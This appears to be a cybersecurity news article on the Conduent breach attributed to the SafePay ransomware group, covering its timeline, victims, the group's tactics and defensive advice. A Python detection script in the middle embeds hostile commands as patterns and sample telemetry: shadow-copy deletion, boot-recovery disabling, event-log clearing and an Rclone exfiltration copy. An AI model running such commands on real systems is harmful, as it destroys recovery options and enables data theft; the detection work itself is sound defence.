Conduent Ransomware Attack: SafePay Gang Exfiltrates 8.5TB of Data Impacting Over 10.5 Million Americans

The Breach That Shook Healthcare and Government Services Across 46 States

In what has become the largest healthcare data breach of 2025, business process outsourcing giant Conduent Business Solutions has confirmed that a sophisticated ransomware attack by the emerging SafePay cybercrime group compromised the sensitive personal and medical information of over 10.5 million individuals across the United States. The breach, which remained undetected for nearly three months, has exposed Social Security numbers, medical records, health insurance details, and other critical personal information of millions of Americans—including over 4 million residents in Texas alone.

Timeline of the Attack

The intrusion timeline reveals a disturbing pattern of prolonged unauthorized access:

  • October 21, 2024: Initial breach occurs as attackers gain access to Conduent's network
  • January 13, 2025: Service disruptions alert Conduent to the cybersecurity incident
  • February 2025: SafePay ransomware group claims responsibility and threatens to publish 8.5 terabytes of stolen data
  • April 2025: Conduent files formal disclosure with the U.S. Securities and Exchange Commission
  • October 2025: Breach notifications begin reaching affected individuals across multiple states

The nearly three-month window of undetected access gave the threat actors ample time to conduct reconnaissance, exfiltrate massive amounts of data, and position themselves for maximum impact. By the time Conduent discovered the breach following service disruptions reported by state agencies including the Wisconsin Child Support Trust Fund, the damage was already extensive.

The Devastating Scope: Who Was Affected

Conduent's role as a critical third-party service provider to government agencies and healthcare organizations magnified the breach's impact across multiple sectors:

By the Numbers:

  • 10.5+ million individuals affected nationwide
  • Over 4 million victims in Texas—one of the largest state-level breaches in history
  • 76,000 individuals in Washington State
  • 462,000 Blue Cross Blue Shield of Montana members
  • 310,000 UT Select and UT Care plan members in Texas
  • Hundreds affected in Maine and Massachusetts

Impacted Organizations:

  • Healthcare Providers: Humana, Premera Blue Cross, Blue Cross Blue Shield of Montana and Texas
  • Government Services: Medicaid, CHIP (Children's Health Insurance Program), child support payment systems
  • Federal Programs: Government payment disbursements for federally funded benefit and payment card programs

Conduent supports approximately 100 million U.S. residents across 46 states through various government health programs and operates many of the largest toll systems in the country. This wide-reaching service model meant that a single breach had cascading effects across healthcare, government operations, and critical infrastructure.

What Data Was Compromised

The types of information stolen represent a cybercriminal's treasure trove for identity theft, medical fraud, and financial crimes:

Personal Identifiable Information (PII):

  • Full names and addresses
  • Social Security numbers
  • Dates of birth
  • Contact information

Protected Health Information (PHI):

  • Medical treatment information
  • Health insurance policy and ID numbers
  • Medical history and claims data
  • Health condition details

This combination of PII and PHI creates particularly dangerous scenarios for victims. Unlike credit card numbers that can be canceled and replaced, Social Security numbers and medical records are permanent aspects of a person's identity. The exposed data can be exploited for:

  • Medical identity theft and fraudulent insurance claims
  • Tax fraud and benefits theft using stolen SSNs
  • Targeted phishing campaigns leveraging personal health information
  • Creation of synthetic identities combining real and fake information
  • Long-term financial fraud schemes

Meet SafePay: The Rising Threat

SafePay ransomware emerged in September-October 2024 and rapidly ascended to become one of the most active ransomware operations globally by May 2025. The group's involvement in the Conduent attack marked its first confirmed major strike against a U.S. technology firm and demonstrated the serious threat this relatively new player poses to critical infrastructure.

SafePay's Operational Profile:

Origins and Evolution: Security researchers have identified striking similarities between SafePay's code and leaked LockBit ransomware source code from late 2022. The group also incorporates tactics from other notorious operations including ALPHV/BlackCat and INC Ransom. Some analysts assess with moderate confidence that SafePay may represent a rebrand or evolution of established threat actors, which would explain their immediate high-volume operational tempo and sophisticated techniques.

Attack Methodology: SafePay follows a proven two-phase attack model:

  1. Initial Access Phase:
    • Exploitation of exposed Remote Desktop Protocol (RDP) endpoints
    • Targeting of VPN vulnerabilities, particularly FortiGate SSL VPN implementations
    • Use of stolen credentials purchased from dark web markets or obtained through infostealer malware
    • Bypassing multi-factor authentication through misconfigured firewalls or weak password policies
  2. Execution Phase:
    • Disabling security defenses using Living Off the Land Binaries (LOLBins) like SystemSettingsAdminFlows.exe
    • Conducting network reconnaissance with scripts like ShareFinder.ps1
    • Archiving data with WinRAR and 7-Zip
    • Exfiltrating files via FileZilla, Rclone, and RDP clipboard
    • Deploying ransomware and encryption within 24 hours of initial access

Technical Capabilities:

SafePay demonstrates sophisticated privilege escalation techniques, including a User Account Control (UAC) bypass method shared with LockBit and ALPHV/BlackCat operations. The malware:

  • Checks for Cyrillic system languages to avoid infecting machines in Eastern European countries
  • Terminates critical processes for databases, backups, and productivity applications
  • Deletes shadow copies and tampers with boot configurations to prevent recovery
  • Clears security logs and deploys anti-forensics scripts
  • Uses AES and RSA encryption ciphers for file locking

The group maintains infrastructure on both the traditional Tor network and The Open Network (TON), providing redundant platforms for victim communication and data leaking. This dual-channel approach makes takedown efforts more difficult.

Double Extortion Tactics:

SafePay employs aggressive pressure tactics:

  • Encrypts victim files while simultaneously stealing data
  • Issues aggressive 72-hour initial deadlines
  • Threatens to publish or sell stolen data if demands aren't met
  • Maintains active leak sites showcasing victim organizations
  • Has claimed over 200 victims since emergence

Security researchers note that SafePay achieves remarkable operational efficiency, consistently completing full network compromise and encryption within 24 hours of initial access—significantly faster than industry averages. This compressed timeline reduces detection and response opportunities while maximizing operational success rates.

The Aftermath: Response and Impact

Financial Costs:

Conduent reported $25 million in direct breach response costs as of May 2025, with final costs expected to climb substantially higher. These expenses include:

  • Third-party forensic investigation (including engagement of Palo Alto Networks)
  • Legal fees and regulatory compliance
  • Credit monitoring services (though not offered to all victims)
  • System restoration and security enhancements
  • Notification costs across multiple states

Operational Disruption:

The attack caused immediate service outages affecting:

  • Electronic money transfers
  • EBT (Electronic Benefit Transfer) payment systems
  • Child support payment processing
  • Medicaid and CHIP service delivery
  • Government payment disbursements

While Conduent stated it restored most systems within days—and in some cases, hours—the disruption left vulnerable populations without access to critical benefits and payments during the initial response period.

Regulatory Response:

Conduent filed breach notifications with:

  • U.S. Securities and Exchange Commission (SEC)
  • Attorney General offices in Texas, Oregon, California, Montana, Maine, Massachusetts, Washington, and New Hampshire
  • State regulators across 46 states
  • Law enforcement agencies

Organizations facing similar incidents should understand their data breach notification obligations across different jurisdictions.

The Department of Health and Human Services' Office for Civil Rights should have been notified, but the breach is not yet listed on the OCR breach portal due to the government shutdown that began in late September 2025.

The HIPAA Journal has ranked the Conduent data breach as the eighth largest healthcare data breach of all time and the largest of 2025.

The Third-Party Risk Problem

The Conduent breach exemplifies a growing trend in cybersecurity: third-party vendors and business associates have become prime targets for ransomware groups because they serve as single points of failure affecting multiple organizations simultaneously.

Conduent provides critical back-office services including:

  • Third-party printing and mailroom services
  • Document processing
  • Payment integrity services
  • Claims processing
  • Benefits administration

When such a vendor is compromised, the blast radius extends far beyond a single organization. In this case:

  • Multiple healthcare insurers were affected despite their own systems remaining secure
  • Government agencies across dozens of states experienced service disruptions
  • Millions of beneficiaries had no relationship with Conduent but had their data exposed through their healthcare providers and government programs

This attack underscores the critical importance of:

  • Vendor risk management programs that continuously assess third-party security postures
  • Contractual security requirements including incident response obligations
  • Regular security audits of business associate relationships
  • Data minimization practices to limit what information is shared with vendors
  • Segmentation to prevent vendor access from becoming a pathway to crown jewel systems

What Victims Should Do Now

If you receive a breach notification from Conduent or any of the affected healthcare organizations and government agencies:

Immediate Actions:

  1. Monitor Financial Accounts: Review bank statements, credit card activity, and insurance claims for unauthorized transactions
  2. Check Credit Reports: Obtain free credit reports from all three major bureaus (Equifax, Experian, TransUnion) at AnnualCreditReport.com
  3. Consider a Credit Freeze: Place a security freeze on your credit files to prevent new accounts from being opened in your name. Contact:
    • Equifax: 1-800-349-9960
    • Experian: 1-888-397-3742
    • TransUnion: 1-888-909-8872
  4. Set Up Fraud Alerts: Place a fraud alert on your credit reports, requiring creditors to verify your identity before extending credit
  5. Monitor Medical Records: Request copies of your medical records to check for fraudulent treatments or prescriptions
  6. Watch for Phishing: Be alert to emails, texts, or calls claiming to be from Conduent, your health insurer, or government agencies. Scammers exploit breach notifications to conduct targeted phishing campaigns

Long-Term Protection:

  • File Taxes Early: File your tax return as early as possible to prevent fraudsters from filing fake returns using your SSN
  • Monitor Government Benefits: Regularly verify that your Social Security, Medicare, and Medicaid accounts show no suspicious activity
  • Use Identity Monitoring Services: Consider enrolling in identity theft protection services that monitor the dark web for your personal information
  • Document Everything: Keep records of all breach notifications, correspondence, and any suspicious activity
  • Know Your Rights: Understand your privacy rights under various state and federal regulations including HIPAA, state breach notification laws, and consumer protection statutes

Contact Information:

Conduent has established a dedicated assistance line for affected individuals:

  • Phone: 855-291-2608
  • Hours: Monday through Friday, 9:00 AM to 9:00 PM Eastern Time

The Bigger Picture: Lessons for Organizations

The Conduent breach offers critical lessons for organizations across all sectors:

1. Detection Time Matters

The nearly three-month dwell time allowed attackers to conduct thorough reconnaissance and exfiltrate 8.5 terabytes of data. Organizations must:

  • Implement robust Security Information and Event Management (SIEM) solutions
  • Deploy Endpoint Detection and Response (EDR) tools across all systems
  • Establish 24/7 Security Operations Center (SOC) monitoring
  • Conduct regular threat hunting exercises

2. RDP and VPN Remain Critical Vulnerabilities

SafePay's preferred attack vector exploits exposed RDP endpoints and VPN vulnerabilities. Organizations should:

  • Implement multi-factor authentication on all remote access systems
  • Patch VPN appliances and RDP gateways immediately when updates are available
  • Use network segmentation to limit lateral movement
  • Monitor and log all remote access activity
  • Consider Zero Trust Network Access (ZTNA) solutions

3. The 24-Hour Encryption Window

SafePay's ability to achieve full network encryption within 24 hours of access demands:

  • Incident response plans that can activate within hours, not days
  • Offline, immutable backups tested regularly
  • Network segmentation to slow lateral movement
  • Privileged access management to limit credential abuse

4. Third-Party Risk Is Enterprise Risk

Organizations must treat vendor security as an extension of their own security programs:

  • Conduct thorough security assessments before contracting with vendors
  • Require contractual security standards and audit rights
  • Monitor vendor security posture continuously
  • Maintain incident response coordination with critical vendors
  • Implement data flow mapping to understand third-party data exposure

5. Ransomware Is About Data Theft, Not Just Encryption

Modern ransomware operations like SafePay focus on data exfiltration and extortion, making encryption secondary. This shift requires:

  • Data loss prevention (DLP) tools to detect large file transfers
  • Network traffic analysis to identify exfiltration patterns
  • Data classification programs to understand what's at risk
  • Encryption of sensitive data at rest
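The execution-phase behaviours listed under SafePay's attack methodology (archiving with WinRAR/7-Zip, transfers via Rclone or FileZilla, shadow-copy deletion, boot-configuration tampering, log clearing) are individually common on a busy network; what makes them a signal is several of them landing on one host inside the group's compressed timeline. The following is an added detection example, not code from the article, Conduent, or any vendor it cites: it classifies constructed process-creation records and flags a host only when distinct categories co-occur within a window. The command-line patterns are the usual Windows implementations of those behaviours and are an assumption; the article names the behaviours, not exact commands.

```python
"""Per-host correlation of the ransomware execution-phase behaviours described above.

Added example, not code from the article, Conduent, or any vendor it names.
Input: constructed process-creation records (fields loosely modelled on Sysmon
Event ID 1). The command-line patterns are an assumption about how the listed
behaviours are usually carried out on Windows, not commands taken from the page.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# category -> (image basenames, substring that must also appear in the command line)
RULES = {
    "archive_staging": ({"rar.exe", "winrar.exe", "7z.exe", "7za.exe"}, None),
    "exfil_tooling": ({"rclone.exe", "filezilla.exe"}, None),
    "shadow_copy_deletion": ({"vssadmin.exe"}, "delete shadows"),
    "boot_config_tamper": ({"bcdedit.exe"}, "recoveryenabled no"),
    "log_clearing": ({"wevtutil.exe"}, " cl "),
}


def classify(event):
    """Return the behaviour category for one process-creation event, or None."""
    image = ntpath.basename(event["image"]).lower()
    cmd = " " + event["cmdline"].lower() + " "
    for category, (images, needle) in RULES.items():
        if image in images and (needle is None or needle in cmd):
            return category
    return None


def correlate(events, window=timedelta(hours=24), min_categories=3):
    """Flag hosts showing >= min_categories distinct behaviours inside one window.

    Thresholding on distinct categories, not event count, keeps a backup server
    that archives nightly quiet while catching staging + exfil + recovery inhibition."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        cat = classify(ev)
        if cat:
            hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), cat))
    flagged = {}
    for host, seq in hits.items():
        for i, (t0, _) in enumerate(seq):
            cats = {c for t, c in seq[i:] if t - t0 <= window}
            if len(cats) >= min_categories:
                flagged[host] = sorted(cats)
                break
    return flagged


# Constructed telemetry: a nightly backup job (benign) and a workstation running
# the staging -> exfiltration -> recovery-inhibition chain within a day.
SAMPLE_EVENTS = [
    {"ts": "2025-03-02T01:00:00", "host": "SRV-BKP-01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -t7z nightly.7z D:\exports"},
    {"ts": "2025-03-02T22:10:00", "host": "WS-FIN-07", "image": r"C:\Users\Public\rar.exe",
     "cmdline": r"rar.exe a -r -v2g staging.rar \\fileshare\claims"},
    {"ts": "2025-03-02T22:45:00", "host": "WS-FIN-07", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Users\Public\staging remote:bucket"},
    {"ts": "2025-03-03T03:05:00", "host": "WS-FIN-07", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
]

if __name__ == "__main__":
    for host, cats in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(cats)}")
```

Shrinking the window below the group's 24-hour operating tempo loses the chain, which is the practical argument for correlating over at least a day rather than per-alert.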

The Evolution of Ransomware Economics

SafePay's emergence and rapid success illustrate the evolving ransomware ecosystem. The group reportedly operates as an independent ransomware operation rather than a Ransomware-as-a-Service (RaaS) model, maintaining centralized control over operations, infrastructure, and negotiations.

This operational model suggests:

  • Experienced operators: The sophistication and volume of attacks indicate involvement of skilled threat actors, possibly veterans from previous operations
  • Financial motivation: Primary targeting of financial, legal, and insurance sectors (hence the name "SafePay") shows strategic victim selection
  • Expanding scope: Recent shift to targeting healthcare and critical infrastructure indicates either growing ambition or declining availability of original target categories

The group's claimed theft of 8.5 terabytes from Conduent represents one of the largest documented data exfiltration events in ransomware history, demonstrating both technical capability and patience to extract such massive datasets without detection.

Looking Forward: The Ransomware Landscape in 2025

The Conduent incident is part of a broader pattern. After law enforcement disruptions of major operations like LockBit and ALPHV in 2023-2024, the ransomware ecosystem has fragmented. New groups like SafePay are competing to fill the void, often recruiting experienced affiliates and operators from defunct operations.

Key trends to watch:

Consolidation of targeting: Groups increasingly focus on high-value targets like healthcare, government contractors, and critical infrastructure where downtime and data exposure create maximum pressure to pay

Sophistication increase: New groups are launching with mature capabilities, suggesting experienced operators rebranding or collaborating

Third-party exploitation: Vendors and business associates continue to be lucrative targets due to their access to multiple organizations' data

Speed of operations: The 24-hour encryption timeline is becoming standard, reducing detection and response windows

Geopolitical dimensions: The presence of CIS (Commonwealth of Independent States) language killswitches in SafePay malware suggests potential Eastern European or Russian origins, raising questions about state tolerance or sponsorship

Conclusion: A Wake-Up Call for Critical Infrastructure

The Conduent ransomware attack serves as a stark reminder that cybersecurity failures at third-party vendors can have catastrophic ripple effects across entire sectors of the economy. When a single breach exposes the personal and medical information of over 10.5 million Americans—including 4 million Texans—the incident transcends typical corporate data breach discussions and becomes a matter of national security and public health.

SafePay's emergence as a major threat actor, combined with their ability to remain undetected for nearly three months while exfiltrating 8.5 terabytes of sensitive data, demonstrates that the ransomware threat continues to evolve and intensify. Organizations must adapt their security strategies accordingly.

For affected individuals, vigilance is paramount. With Social Security numbers and medical records in criminal hands, the risk of identity theft and fraud will persist for years. Regular monitoring, credit freezes, and awareness of phishing attempts targeting breach victims should become routine practices.

For organizations—especially those handling sensitive personal information or serving as critical vendors—the message is clear: robust cybersecurity is no longer optional. The stakes are too high, the attackers too sophisticated, and the consequences too severe. The question is no longer if your organization will face a sophisticated attack, but when—and whether you'll be prepared to detect and respond before months of unauthorized access turn into millions of exposed records.


About This Breach: Information in this article is compiled from official breach notifications filed with state attorney general offices, SEC filings, and security research from leading cybersecurity firms including Huntress, Palo Alto Networks, SOCRadar, Check Point, and others. Figures represent confirmed impacts as of October 2025, with final totals potentially higher as additional notifications are filed.
